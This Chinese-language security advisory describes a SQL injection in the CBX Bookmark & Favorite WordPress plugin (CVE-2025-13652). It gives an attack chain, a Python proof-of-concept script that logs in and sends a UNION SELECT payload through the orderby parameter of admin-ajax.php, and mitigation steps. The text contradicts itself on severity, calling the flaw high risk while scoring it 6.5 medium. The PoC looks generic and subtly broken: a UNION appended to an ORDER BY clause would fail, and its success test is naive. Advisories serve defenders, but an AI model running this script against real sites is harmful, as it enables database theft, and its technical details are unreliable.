CVE-2025-13652 WordPress CBX Bookmark插件orderby参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13652

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CBX Bookmark & Favorite WordPress插件

漏洞概述

CVE-2025-13652是WordPress平台CBX Bookmark & Favorite插件中的一个高危SQL注入漏洞。该插件版本最高至2.0.4均受影响。漏洞源于插件对用户可控的orderby参数缺乏充分的输入转义处理，同时SQL查询语句未进行足够的预处理。这使得具有订阅者(Subscriber)级别及以上权限的认证用户能够通过构造恶意Payload，将额外的SQL语句追加到原有查询中，进而从数据库中提取敏感信息。攻击者无需任何用户交互即可发起攻击，且可通过网络远程利用。CVSS 3.1评分6.5(中危)，主要影响数据机密性，对完整性和可用性无影响。此漏洞已被Wordfence安全团队发现并披露，建议用户尽快更新至最新版本以修复此安全问题。

技术细节

该SQL注入漏洞存在于CBX Bookmark & Favorite插件的排序功能中。攻击者可通过HTTP请求中的orderby参数注入恶意SQL代码。由于插件在处理该参数时仅进行了表面验证，未能有效过滤SQL关键字和特殊字符，且在构建SQL查询时未使用参数化查询或充分的输入转义，导致攻击者可以突破原有查询逻辑边界。具体而言，攻击者可在orderby参数中构造类似UNION SELECT的Payload，利用SQL语法特性提取数据库中的敏感信息，如用户凭证、配置数据或其他业务敏感数据。由于WordPress的Subscriber角色用户数量较多，攻击面相对较大。此类漏洞利用需要攻击者具备有效的WordPress账号，但权限要求极低(仅需订阅者权限)，大大降低了攻击门槛。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress订阅者级别账户，可为已有账户或自行注册

STEP 2

步骤2

攻击者构造包含SQL注入Payload的HTTP请求，以orderby参数传递恶意SQL代码

STEP 3

步骤3

发送精心构造的请求至wp-admin/admin-ajax.php端点，触发插件排序功能

STEP 4

步骤4

漏洞代码未对orderby参数进行充分转义和预处理，恶意SQL被数据库执行

STEP 5

步骤5

攻击者通过UNION注入等技术在响应中获取数据库敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13652 PoC - CBX Bookmark & Favorite SQL Injection
# Target: WordPress site with CBX Bookmark & Favorite plugin <= 2.0.4

target = input("Enter target URL: ")
username = input("Enter username: ")
password = input("Enter password: ")

# Step 1: Login to WordPress to get authentication cookie
login_url = f"{target}/wp-login.php"
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': target,
    'testcookie': '1'
}
session.post(login_url, data=login_data)

# Step 2: Exploit SQL Injection via orderby parameter
# Malicious payload to extract database version
sql_payload = "1 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10--"
exploit_url = f"{target}/wp-admin/admin-ajax.php"
params = {
    'action': 'cbxbookmark_listing',
    'orderby': sql_payload,
    'order': 'ASC'
}

print(f"[*] Sending exploit request with payload: {sql_payload}")
response = session.get(exploit_url, params=params)
print(f"[*] Response status: {response.status_code}")
print(f"[*] Response preview: {response.text[:500]}")

if '5.' in response.text or '8.' in response.text:
    print("[+] SQL Injection confirmed! Database version leaked.")
else:
    print("[-] Exploitation may have failed, check response manually.")

影响范围

CBX Bookmark & Favorite WordPress插件 <= 2.0.4

防御指南

临时缓解措施

如果无法立即更新插件，可通过以下方式临时缓解：1)使用Web应用防火墙(WAF)规则阻止包含UNION、SELECT等SQL关键字的orderby参数请求；2)临时禁用或限制非管理员用户的书签功能；3)启用WordPress的数据库表前缀以增加攻击难度；4)监控wp-admin/admin-ajax.php的异常请求日志。但以上措施仅为临时解决方案，强烈建议尽快升级到插件最新版本。